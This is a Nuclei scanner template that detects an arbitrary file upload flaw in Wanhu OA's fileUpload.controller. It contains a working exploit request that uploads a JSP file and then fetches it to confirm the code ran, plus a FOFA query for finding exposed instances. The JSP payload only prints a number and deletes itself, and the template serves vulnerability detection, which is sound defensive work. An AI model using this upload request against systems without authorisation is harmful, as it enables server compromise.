nuclei-templates/http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml

id: wanhu-oa-fileupload-controller

info:
  name: Wanhu OA Fileupload Controller - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    There is an arbitrary file upload vulnerability in Wanhu OA fileUpload.controller. An attacker can upload any file through the vulnerability.    
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20fileUpload.controller%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md?plain=1#L24
    - https://github.com/tr0uble-mAker/POC-bomber/blob/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/pocs/redteam/wanhu_oa_fileupload-controller_fileupload_2022.py#L20
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="万户网络-ezOFFICE"
  tags: wanhu,oa,fileupload,controller,intrusive
variables:
  num1: "{{rand_int(1000, 9999)}}"
  num2: "{{rand_int(1000, 9999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"

http:
  - raw:
      - |
        POST /defaultroot/upload/fileUpload.controller HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
        Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6

        --b0d829daa06c13d6b3e16b0ad21d1eed
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
        Content-Type: application/octet-stream

        <%out.print({{num1}}*{{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
        --b0d829daa06c13d6b3e16b0ad21d1eed--        
      - |
        GET /defaultroot/upload/html/{{filename}} HTTP/1.1
        Host: {{Hostname}}        

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1, "\"result\":\"success\"") && contains(body_1,"fileSize")'
          - 'status_code_2 == 200 && contains(body_2,"{{result}}")'
        condition: and

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - '"data":"(.*?)"'
        internal: true

# digest: 4a0a004730450220285126b729ccfd09f0e766a08c863930f1745d4071db7394de32056e9ff8dbf4022100f804bdbc219b632b22c97298af1e2d8eddf3c193532ce219e906096c2ff25f2b:922c64590222798bb761d5b6d8e72950